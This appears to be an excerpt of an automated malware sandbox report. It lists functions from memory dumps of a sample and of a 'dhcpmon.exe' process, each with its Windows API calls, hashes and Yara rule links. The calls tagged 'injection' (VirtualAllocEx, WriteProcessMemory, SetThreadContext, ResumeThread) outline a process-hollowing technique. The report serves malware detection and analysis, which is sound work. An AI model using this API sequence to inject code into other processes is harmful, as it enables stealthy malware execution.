Instruction Fuzzy Hash: 2121D5B5900258DFDB10CFAAD984ADEBFF4FB48324F14841AE914A7750D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01376DB9, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01376E47

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e0bdbfa9384ae3c0958bfc3d6bab5b6b4247c8e9b0c749a7e30674e6cdb6d83a
Instruction ID: 07b3a2ab7ebccaf8d74875f3dfb09000d410e52a31a2335f5a21b11f14b31ba6
Opcode Fuzzy Hash: e0bdbfa9384ae3c0958bfc3d6bab5b6b4247c8e9b0c749a7e30674e6cdb6d83a
Instruction Fuzzy Hash: 0F21B3B5D00218EFDB10CFA9D985AEEBBF4EB48324F14841AE915A7750D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0137B0D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0137BE89,00000800,00000000,00000000), ref: 0137C09A

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a53349a0a8accd7c8b6b2e21b5c6f792cc8d1aa8e8a745492b9e5d1c9076195e
Instruction ID: 4de7db8b318de7a2ffbb7ff92d163eafbad90b5ad64563e7f7bba9b5fa29910b
Opcode Fuzzy Hash: a53349a0a8accd7c8b6b2e21b5c6f792cc8d1aa8e8a745492b9e5d1c9076195e
Instruction Fuzzy Hash: C51103B69002099FDB24CF9AD844BDEFBF4EB89368F00842ED515A7610C379A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 090BAD30, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090BAD9E

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a1cb0b47b3e24f96f3951397390928a4cfa856c3df288e6d03222e3c104334fa
Instruction ID: 096fa6bacd503db8b2fae8f30800e61c198f46b34bff578066f72245d9739271
Opcode Fuzzy Hash: a1cb0b47b3e24f96f3951397390928a4cfa856c3df288e6d03222e3c104334fa
Instruction Fuzzy Hash: 441137719002489FCF10CFAAC8447EFBBF5EF88324F148819E525A7250C779A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0137C028, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0137BE89,00000800,00000000,00000000), ref: 0137C09A

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b0da03e1e9a4b23fe53b706912e60304960b3485ff03ba15128cab4e98db73c5
Instruction ID: ad30b66e708f46862ab143f3c9809db65e926e7bfad7acad24ff1a7771488ebb
Opcode Fuzzy Hash: b0da03e1e9a4b23fe53b706912e60304960b3485ff03ba15128cab4e98db73c5
Instruction Fuzzy Hash: 2A1100B68002098FDB14CF9AC984BEEFBF4AB48328F14852AD515A7610C778A549CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 090BABA8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 090BAC0A

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1abf52516f5273e2e41bbff688cd956b22fa16a0d4fe85381a820348bc7b3726
Instruction ID: daf4e406aab649a7e44485bc844522f3b90e40bf92460c6ebbff92975badc4c7
Opcode Fuzzy Hash: 1abf52516f5273e2e41bbff688cd956b22fa16a0d4fe85381a820348bc7b3726
Instruction Fuzzy Hash: F1113A719043488FCB10DFAAC4447EEFBF4EB88324F14881AD515A7650CB78A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 090B2478, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 090BE625

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7aace5e3ffbf95de5bdc6d45a10346f3b7e7bb8069ffae1c2b2629eec9056eaf
Instruction ID: 1873b75a28dba26842ee40ca3a92634d710466eff4fa3c875cc2f30933116be8
Opcode Fuzzy Hash: 7aace5e3ffbf95de5bdc6d45a10346f3b7e7bb8069ffae1c2b2629eec9056eaf
Instruction Fuzzy Hash: CB1103B5800348DFDB10CF99D888BEEBBF8EB58724F108819E515A7600C3B4A944CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0137BDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0137BE0E

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 93a1a10d05b5911d8c92d14e5c6e1207c106d63b95ed7e3fe18d18410a735486
Instruction ID: 8c5ba777d173a8fa4af1f900281e61d3871ad111f3bcf65084a651ce30cae3b0
Opcode Fuzzy Hash: 93a1a10d05b5911d8c92d14e5c6e1207c106d63b95ed7e3fe18d18410a735486
Instruction Fuzzy Hash: 8F11E3B5C006498FDB20CF9AD444BDEFBF4EB88224F14841AD569A7610C378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0137DEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0137DF1D

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 226d6a76ec87c6a5a36daea4cc09e4d284c5e0565b38409589702c267669a026
Instruction ID: a98962c1fded65cbe9f6dee6f9d3aa7b529c2865916e9b6b7459eccbb1d6ff7a
Opcode Fuzzy Hash: 226d6a76ec87c6a5a36daea4cc09e4d284c5e0565b38409589702c267669a026
Instruction Fuzzy Hash: 2211E2B5800249DFDB20CF9AD885BDEBBF8EF48324F10841AE955A7740C378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0137DEB9, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0137DF1D

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 5072d4bb3e11d4da7fc58d76c6d9edc768e14dea5dc4f572eebc7f6760eb1ae6
Instruction ID: ef3cf8a4fa25e0e616bbb51ef5810e3ee549616db0314e2a045b2cf510638f18
Opcode Fuzzy Hash: 5072d4bb3e11d4da7fc58d76c6d9edc768e14dea5dc4f572eebc7f6760eb1ae6
Instruction Fuzzy Hash: 0D1100B6900208DFDB10CF99D585BEEBBF8EF58324F14841AE919A7700C378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012AD4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672455992.00000000012AD000.00000040.00000001.sdmp, Offset: 012AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8cbbd0290a454972b1de90ab1d7651e9b6b33a76c0f2317ecc7dba79e7fab65
Instruction ID: d7e5146622bd2bad5f6b33bdf6a8254b9ee6f3d140c74e66ed59fd87c6019381
Opcode Fuzzy Hash: c8cbbd0290a454972b1de90ab1d7651e9b6b33a76c0f2317ecc7dba79e7fab65
Instruction Fuzzy Hash: FA2179B1514208DFCF05CF84E8C0B26BFA5FB88328F64856DE9450B60AC336D846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 012BD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672479440.00000000012BD000.00000040.00000001.sdmp, Offset: 012BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af70ce6aff9d33a318244acc39850cc7660912cff8e4db1dcd0dce93d37b2c4
Instruction ID: eeafefb5469791ab50d542efc019cb95fa89b9dae6da774ad14f9eea1d90f9ec
Opcode Fuzzy Hash: 5af70ce6aff9d33a318244acc39850cc7660912cff8e4db1dcd0dce93d37b2c4
Instruction Fuzzy Hash: FE213775618248DFCB15CF54D8C0BA6BB61FB88398F24C96DD9094B346C37BD807CA61

Uniqueness

Uniqueness Score: -1.00%

Function 012BD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672479440.00000000012BD000.00000040.00000001.sdmp, Offset: 012BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bad45bec6b7466cca4b886325eb43061ea9728a3155813511c3bc3be1b40fc
Instruction ID: dc2a802bbd967aacd3578416505c5b4499813fe073cbf6b5c0ad8c9a2b6ddd16
Opcode Fuzzy Hash: 08bad45bec6b7466cca4b886325eb43061ea9728a3155813511c3bc3be1b40fc
Instruction Fuzzy Hash: EE213771514288EFDB05CF94D9C0BA6BB61FB88368F20C56DD9094B247C376D806CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012BD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672479440.00000000012BD000.00000040.00000001.sdmp, Offset: 012BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c32a74f2cb50c5a497eb779ea8d8c202424cb134bba252a42946efbc4d16a788
Instruction ID: b1ff613d459cc3647249bdf2a267a14288163a389fae13837c1d8ee5a44f3a56
Opcode Fuzzy Hash: c32a74f2cb50c5a497eb779ea8d8c202424cb134bba252a42946efbc4d16a788
Instruction Fuzzy Hash: 99217F754083849FCB02CF24D994B51BF71EB46354F28C5DAD9498B267C33A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 012AD4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672455992.00000000012AD000.00000040.00000001.sdmp, Offset: 012AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction ID: 77b34709957e8955dd744a2bfa93801dc286f5ef393f74254ac8939636f38d1e
Opcode Fuzzy Hash: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction Fuzzy Hash: DB11D376404284CFCF12CF54D5C4B16BF71FB84324F2486A9D9454B617C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 012BD1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672479440.00000000012BD000.00000040.00000001.sdmp, Offset: 012BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction ID: f732177eec51de6f678405a2db57eef942e4d46c3596cfd4f619e6145f7820fb
Opcode Fuzzy Hash: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction Fuzzy Hash: C011BB75904284DFDB02CF54C5C4B95BFB1FB84328F28C6AAD9494B657C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 012AD75D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672455992.00000000012AD000.00000040.00000001.sdmp, Offset: 012AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d81ada571730845824d6e4cc523cb5667e64ac86dbe65ee10ea1649912a56f9
Instruction ID: 21d0ff7d00faba2431ad6f06b9f6a723b0bad91ccebe654026c7bbde0650ee75
Opcode Fuzzy Hash: 6d81ada571730845824d6e4cc523cb5667e64ac86dbe65ee10ea1649912a56f9
Instruction Fuzzy Hash: 5901F7710183D8AFE71C8E56DC84766BFD8EF45B34F488819EE050BA46C7B89844C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 012AD75C, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672455992.00000000012AD000.00000040.00000001.sdmp, Offset: 012AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7215fc7a56257fec1ab1ebb936e8a2109e5e023d7d4519363159f90c1921dfd1
Instruction ID: 1e94d93ab3f520a4c4c479b33d0ed8480c5d3ece7175beb3be37e9d6a84fe89a
Opcode Fuzzy Hash: 7215fc7a56257fec1ab1ebb936e8a2109e5e023d7d4519363159f90c1921dfd1
Instruction Fuzzy Hash: 12F068714043949FE7158A16DC84B62FF98EB41734F18C85AEE145B696C3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 090B32A8, Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

:, xrefs: 090B39B3

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID: :
API String ID: 0-336475711
Opcode ID: 829b2442c1fd5506736553117811e0ac0c0a856465c7734478bf8eded8c7d3df
Instruction ID: d69683e508cbc8b1cc67d40b5b03f9e30575ea8dad101d26c89e23ae7e7ade61
Opcode Fuzzy Hash: 829b2442c1fd5506736553117811e0ac0c0a856465c7734478bf8eded8c7d3df
Instruction Fuzzy Hash: F0515CB1E056588BEB58CF6B8C4069EFAF7AFC9300F14C5BAD50DAA214DB700A818F15

Uniqueness

Uniqueness Score: -1.00%

Function 090B3298, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

Z, xrefs: 090B33CB

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID: Z
API String ID: 0-1505515367
Opcode ID: 75fb138360cb860c7d4d4d253b3fd958dd48de5f1dbe5ce969d171c849976339
Instruction ID: e32738048c5a83a083d703e4f9cc11a855224ade8671fef336d6f02da57407da
Opcode Fuzzy Hash: 75fb138360cb860c7d4d4d253b3fd958dd48de5f1dbe5ce969d171c849976339
Instruction Fuzzy Hash: B44142B1E056588BEB5CCF6B8D4069EFAF3AFC9300F14C5BAD54CAA214DB3009868F15

Uniqueness

Uniqueness Score: -1.00%

Function 090B0D80, Relevance: .9, Instructions: 917COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a94d1a7cd8b967cda466d021b813c41b76a258dfaa3b21dcdd2a9183bbeeca0
Instruction ID: fe07fe9acd3a55c5c7f025c452604311a28a1275d14c011ba3c2ce2912546cdf
Opcode Fuzzy Hash: 6a94d1a7cd8b967cda466d021b813c41b76a258dfaa3b21dcdd2a9183bbeeca0
Instruction Fuzzy Hash: 4E824831A082099FCB94CF68D494AEEBBF2BF49354F158969E855DF2A1C730EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0137C2B0, Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8f44dee6222c61cfc5db679e6274441548faf94f5de41031b8f7755871afa3
Instruction ID: 9f03208dbaae72b67ddf06ebd00c53e126d8a7b37afd08545b53b000396b59cc
Opcode Fuzzy Hash: fa8f44dee6222c61cfc5db679e6274441548faf94f5de41031b8f7755871afa3
Instruction Fuzzy Hash: 26524AB1984706CBDB21EF14F8882997BB1FB4439CBD14A08D2616F7D1D3B8696ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 01379990, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6248c28d398d43b382aa7bc99ea107d576ca4c81a674e6a9247d7f920af99e9
Instruction ID: 7e107e21035fdeac52da74216f58a0419d9f61300c637285e234224d70fdcdbd
Opcode Fuzzy Hash: b6248c28d398d43b382aa7bc99ea107d576ca4c81a674e6a9247d7f920af99e9
Instruction Fuzzy Hash: 94A19E32E0021ACFCF15DFA9C8445DEFBB2FF85308B15856AE905BB225EB35A955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 090B3048, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1514c4c7888881b38347051cf6410a0c4a1c6416143cc0f79084078318fda828
Instruction ID: 1ca1008b423437c11796f0a5a5a33f3c85afe5d18897be13349d016546b75e3b
Opcode Fuzzy Hash: 1514c4c7888881b38347051cf6410a0c4a1c6416143cc0f79084078318fda828
Instruction Fuzzy Hash: 49515C70A2124D8FDB48DFBAE4556DEBBB3AF99304F14C929E0059B368EF705905CB81

Uniqueness

Uniqueness Score: -1.00%

Function 090B3058, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5df2b455d53417701631ed901a6b86064d2b0f03239e0a700c45b183f0702e
Instruction ID: 3925e99656146ef507e421ad8cbdb0b2fe8cd8855b79620ac17aaebb3b1d5807
Opcode Fuzzy Hash: 3a5df2b455d53417701631ed901a6b86064d2b0f03239e0a700c45b183f0702e
Instruction Fuzzy Hash: 54513B70A2020D8FDB48EFBAE4556DE7BB3AB99304F14C929E0059B368EF745905CB81

Uniqueness

Uniqueness Score: -1.00%

Function 090BCE80, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be32d2aeb2539868533c63e32118e34ee7f62955c4962241aef2c9133cac6b3
Instruction ID: 1ce4c0cb66b43e057f96c31d028a8ead96809307019e6b9c89ad51664146f861
Opcode Fuzzy Hash: 3be32d2aeb2539868533c63e32118e34ee7f62955c4962241aef2c9133cac6b3
Instruction Fuzzy Hash: C141F9B1D45629CBDB68CF6AC8447EDF6F6AB88300F00D5BAD41CAA644EB700AC5CF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dhcpmon.exe PID: 6848 Parent PID: 3424 dhcpmon.exeCOMMON

Executed Functions

Function 071FB078, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071FB2AE

Memory Dump Source

Source File: 00000008.00000002.731960483.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f96ff437dd5541b561e023a14a9db1b3774dbce8ad4ae8699601d6e04706db9a
Instruction ID: bdc0975b35d65e3df96e242ebfa13b7fd76774f9c28ce4f358f5aa47e0d817a2
Opcode Fuzzy Hash: f96ff437dd5541b561e023a14a9db1b3774dbce8ad4ae8699601d6e04706db9a
Instruction Fuzzy Hash: 1B919BB1D04619DFDB21CFA4CC81BEEBBB2BF48314F048169D919A7290DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02E6B214, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E6DD8A

Memory Dump Source

Source File: 00000008.00000002.723185651.0000000002E60000.00000040.00000001.sdmp, Offset: 02E60000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 549e75a31b9a18b84ad6368616127d05e1ecf22fa45676f2f3919e1d8f5fceae
Instruction ID: 0a540903d0e0fd60232beab8f3a8e1b142387fa04a109c490b9576679276e046
Opcode Fuzzy Hash: 549e75a31b9a18b84ad6368616127d05e1ecf22fa45676f2f3919e1d8f5fceae
Instruction Fuzzy Hash: A551B0B1D40309AFDB14CF99C884ADEBBB5FF89354F64822AE819AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E6DC6D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E6DD8A

Memory Dump Source

Source File: 00000008.00000002.723185651.0000000002E60000.00000040.00000001.sdmp, Offset: 02E60000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9614e228b725bd26c97209f0b35840b40862da38a91cd47ebabf4a0781a85b4d
Instruction ID: e1f73d77c59db745c60e0d45fdf7292d4f826c50e1189672c9fcf9802641a83b
Opcode Fuzzy Hash: 9614e228b725bd26c97209f0b35840b40862da38a91cd47ebabf4a0781a85b4d
Instruction Fuzzy Hash: 8F51D0B1D00309AFDF14CF99C884ADEBBB5FF89354F64822AE819AB210D7759945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 071FADF0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071FAE80

Memory Dump Source

Source File: 00000008.00000002.731960483.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 27862c0d5dca1e71429095dc8bd6c1dcd97f80f04f07acef51bd7f3be7e44d6b
Instruction ID: 66013dfb5e8df8e03bece560cff1ed407a3291cc8fd82efda27f24a13f69e528
Opcode Fuzzy Hash: 27862c0d5dca1e71429095dc8bd6c1dcd97f80f04f07acef51bd7f3be7e44d6b
Instruction Fuzzy Hash: B82107B19003599FCF10CFA9C8857EEBBF5FF48314F10842AE959A7251CB78A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 071FAC58, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 071FACD6

Memory Dump Source

Source File: 00000008.00000002.731960483.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: f8bd4f76b1fb52c5aabe76867935265d59f07ea39260d5a02ef83731776d2b26
Instruction ID: 50ddd23e62fbfbf096ceb5c75b2269a9da0f161ee0af16a44145ce0dcc3c3640
Opcode Fuzzy Hash: f8bd4f76b1fb52c5aabe76867935265d59f07ea39260d5a02ef83731776d2b26
Instruction Fuzzy Hash: 682134B1D042098FCB10CFAAC4847EEBBF4EF89364F14842AD519A7340CB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 071FAEE0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071FAF60

Memory Dump Source

Source File: 00000008.00000002.731960483.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 20e4b9297ff9f51161714e4dde0735555bfa4bac3530dd119182e478d9440a70
Instruction ID: 24d1eee6d37f0898131607d967b842c4941fc0573cfd957c2d13ecd5e401de6d
Opcode Fuzzy Hash: 20e4b9297ff9f51161714e4dde0735555bfa4bac3530dd119182e478d9440a70
Instruction Fuzzy Hash: 9821E6B1D042599FCF10CFAAC8807EEBBF5FF48314F50842AE559A7250C779A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E66DC0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E66E47

Memory Dump Source

Source File: 00000008.00000002.723185651.0000000002E60000.00000040.00000001.sdmp, Offset: 02E60000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 116f751f9d70d207aad901b401ab8da3d6a534d22730aae4597b47b467ce7738
Instruction ID: d77292dfc44c0be379ef5acb486a0c8b46d5bcbc005560b6cca6bdb4d6c34896
Opcode Fuzzy Hash: 116f751f9d70d207aad901b401ab8da3d6a534d22730aae4597b47b467ce7738
Instruction Fuzzy Hash: 0A21C6B59002489FDB10CF9AD584ADEBBF8EB48364F14841AE914A7350D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E66DB9, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E66E47

Memory Dump Source

Source File: 00000008.00000002.723185651.0000000002E60000.00000040.00000001.sdmp, Offset: 02E60000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f0d98afc84324bd88cbd4311f525501acd8fe1aaa210474642d0c32fa198d301
Instruction ID: 7c7d035fa9e07d1848e75fd95074a1a50a96b20de219c3aa99e328b0d7429912
Opcode Fuzzy Hash: f0d98afc84324bd88cbd4311f525501acd8fe1aaa210474642d0c32fa198d301
Instruction Fuzzy Hash: B221E4B5D00208DFDB10CFA9D984AEEBBF4EB48324F14841AE915B7350D378AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E6B0D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E6BE89,00000800,00000000,00000000), ref: 02E6C09A

Memory Dump Source

Source File: 00000008.00000002.723185651.0000000002E60000.00000040.00000001.sdmp, Offset: 02E60000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2e9823d011258e22205353f474c6281ebe398785efbd758918e789d05986ddc1
Instruction ID: 56b569c7f4d135c429222ca0bc55b464b5b55567d0d688eb334b088e540fa26f
Opcode Fuzzy Hash: 2e9823d011258e22205353f474c6281ebe398785efbd758918e789d05986ddc1
Instruction Fuzzy Hash: C11133B29042088FCB10CF9AC448BEEBBF4EB88364F10942AD459A7600C779A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 071FAD30, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071FAD9E

Memory Dump Source

Source File: 00000008.00000002.731960483.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fa56b4ce42b2efa1a6885d8c4a25946a8c3e65b6e086f76dde08ed2fee9b6113
Instruction ID: 0438f5dac3fc4395b7f18644f7f9fdd6f65dc429f0c9cae64b1b13bf024cbc01
Opcode Fuzzy Hash: fa56b4ce42b2efa1a6885d8c4a25946a8c3e65b6e086f76dde08ed2fee9b6113
Instruction Fuzzy Hash: 7F111C719042499FCF10DFA9C8447DFBBF5EF88324F148419D555A7250CB79A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E6C028, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E6BE89,00000800,00000000,00000000), ref: 02E6C09A

Memory Dump Source

Source File: 00000008.00000002.723185651.0000000002E60000.00000040.00000001.sdmp, Offset: 02E60000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3a1d47606d86d6cc5dc05e56c19c57523db4bce518412a174bcf23a47ba39369
Instruction ID: fe17cc68948e18525077ce2f01dd69697ab1c10dce02f8d41b458fc0fed69fd6
Opcode Fuzzy Hash: 3a1d47606d86d6cc5dc05e56c19c57523db4bce518412a174bcf23a47ba39369
Instruction Fuzzy Hash: 381103B69002098FCB14CF9AC548BDEFBF4AB88364F14852AD455B7610C779A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 071FABA8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 071FAC0A

Memory Dump Source

